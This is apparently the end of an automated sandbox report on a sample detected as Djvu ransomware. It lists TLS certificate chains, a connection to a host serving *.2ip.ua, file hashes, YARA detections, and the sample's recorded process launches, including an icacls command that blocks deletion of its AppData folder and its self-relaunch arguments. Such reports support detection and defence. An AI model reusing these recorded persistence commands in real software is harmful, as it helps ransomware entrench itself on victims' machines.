                                                                                                                                                                            CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            Aug 3, 2021 19:00:29.407361031 CEST77.123.139.190443192.168.2.449748CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                            CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                                            Code Manipulations

                                                                                                                                                                            Statistics

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:00:03
                                                                                                                                                                            Start date:03/08/2021
                                                                                                                                                                            Path:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\TpZ10Hfjov.exe'
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:743424 bytes
                                                                                                                                                                            MD5 hash:11F5960EA7DE49E5B29A775E3A0F1782
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.652637275.0000000004A10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:00:05
                                                                                                                                                                            Start date:03/08/2021
                                                                                                                                                                            Path:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\TpZ10Hfjov.exe'
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:743424 bytes
                                                                                                                                                                            MD5 hash:11F5960EA7DE49E5B29A775E3A0F1782
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000003.00000001.651406609.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000001.651406609.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:00:07
                                                                                                                                                                            Start date:03/08/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:icacls 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d' /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                            Imagebase:0x13b0000
                                                                                                                                                                            File size:29696 bytes
                                                                                                                                                                            MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:00:09
                                                                                                                                                                            Start date:03/08/2021
                                                                                                                                                                            Path:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:743424 bytes
                                                                                                                                                                            MD5 hash:11F5960EA7DE49E5B29A775E3A0F1782
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.665074291.0000000004AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:00:10
                                                                                                                                                                            Start date:03/08/2021
                                                                                                                                                                            Path:C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe --Task
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:743424 bytes
                                                                                                                                                                            MD5 hash:11F5960EA7DE49E5B29A775E3A0F1782
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.669744021.00000000049E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:00:11
                                                                                                                                                                            Start date:03/08/2021
                                                                                                                                                                            Path:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:743424 bytes
                                                                                                                                                                            MD5 hash:11F5960EA7DE49E5B29A775E3A0F1782
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000001.664324042.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000001.664324042.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Code Analysis

                                                                                                                                                                            Reset < >